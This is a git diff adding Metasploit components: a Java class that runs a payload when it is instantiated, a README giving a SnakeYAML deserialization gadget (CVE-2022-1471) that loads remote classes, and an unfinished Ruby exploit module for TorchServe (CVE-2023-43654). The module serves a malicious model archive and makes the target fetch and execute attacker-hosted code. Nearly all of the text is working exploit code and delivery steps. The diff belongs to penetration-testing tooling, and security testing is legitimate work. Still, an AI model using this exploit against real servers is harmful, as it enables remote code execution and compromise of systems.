diff --git a/data/exploits/CVE-2022-1471/MyScriptEngineFactory.class b/data/exploits/CVE-2022-1471/MyScriptEngineFactory.class new file mode 100644 index 0000000000..ae365960f8 Binary files /dev/null and b/data/exploits/CVE-2022-1471/MyScriptEngineFactory.class differ diff --git a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java new file mode 100644 index 0000000000..da5e382547 --- /dev/null +++ b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java @@ -0,0 +1,72 @@ +// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java +import javax.script.ScriptEngine; +import javax.script.ScriptEngineFactory; +import java.io.IOException; +import java.util.List; +import metasploit.*; + +public class MyScriptEngineFactory implements ScriptEngineFactory { + public MyScriptEngineFactory() throws Exception { + Payload.main(null); + } + + @Override + public String getEngineName() { + return null; + } + + @Override + public String getEngineVersion() { + return null; + } + + @Override + public List getExtensions() { + return null; + } + + @Override + public List getMimeTypes() { + return null; + } + + @Override + public List getNames() { + return null; + } + + @Override + public String getLanguageName() { + return null; + } + + @Override + public String getLanguageVersion() { + return null; + } + + @Override + public Object getParameter(String key) { + return null; + } + + @Override + public String getMethodCallSyntax(String obj, String m, String... args) { + return null; + } + + @Override + public String getOutputStatement(String toDisplay) { + return null; + } + + @Override + public String getProgram(String... statements) { + return null; + } + + @Override + public ScriptEngine getScriptEngine() { + return null; + } +} diff --git a/external/source/exploits/CVE-2022-1471/README.md b/external/source/exploits/CVE-2022-1471/README.md new file mode 100644 index 0000000000..a46db950d2 --- /dev/null +++ b/external/source/exploits/CVE-2022-1471/README.md @@ -0,0 +1,17 @@ +# Overview +The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit +CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project. + +## Compiling +Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`. + +## Usage +Trigger the deserialization using the following YAML: +```yaml +!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]] +``` + +Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The +contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's +`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to +deliver a Metasploit payload. diff --git a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb new file mode 100644 index 0000000000..75aa109cc7 --- /dev/null +++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb @@ -0,0 +1,110 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex/zip' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Java + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Java::HTTP::ClassLoader + # prepend Msf::Exploit::Remote::AutoCheck + + def initialize(_info = {}) + super( + 'Name' => '', + 'Description' => %q{ + + }, + 'Author' => [ + 'Spencer McIntyre' + ], + 'References' => [ + [ 'CVE', '' ], + ], + 'DisclosureDate' => '', + 'License' => MSF_LICENSE, + 'DefaultOptions' => { + 'RPORT' => 8081 + }, + 'Targets' => [ + [ + 'Automatic', { + 'Platform' => 'java', + 'Arch' => [ARCH_JAVA] + } + ], + ], + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + end + + def class_name + 'MyScriptEngineFactory' + end + + def constructor_class + ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class")) + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + vprint_good("Payload requested by #{cli.peerhost} using #{agent}") + + if request.relative_resource.end_with?('.mar') + send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' }) + return + end + + if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory') + send_response(cli, class_name, { + 'Content-Type' => 'application/octet-string', + 'Connection' => 'close', + 'Pragma' => 'no-cache' + }) + return + end + + super(cli, request) + end + + def generate_mar + mri = Rex::Zip::Archive.new + mri.add_file('model.pt', '') + mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({ + 'createdOn' => '04/10/2023 16:23:53', + 'runtime' => 'python', + 'model' => { + 'modelName' => @mar_filename.delete_suffix('.mar'), + 'serializedFile' => 'model.pt', + 'handler' => 'image_classifier', + 'modelVersion' => '1.0', + 'configFile' => 'config.yml' + }, + 'archiverVersion' => '0.8.2' + })) + mri.add_file('config.yml', %( !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["#{get_uri}/"]]]] )) + mri.pack + end + + def exploit + @classloader_uri = start_service + + @mar_filename = rand_text_alphanumeric(rand(8..15)) + '.mar' + send_request_cgi({ + 'method' => 'POST', + 'uri' => '/models', + 'vars_get' => { # *must* be vars_get and not vars_post! + 'url' => "#{get_uri}#{@mar_filename}" + } + }) + handler + end +end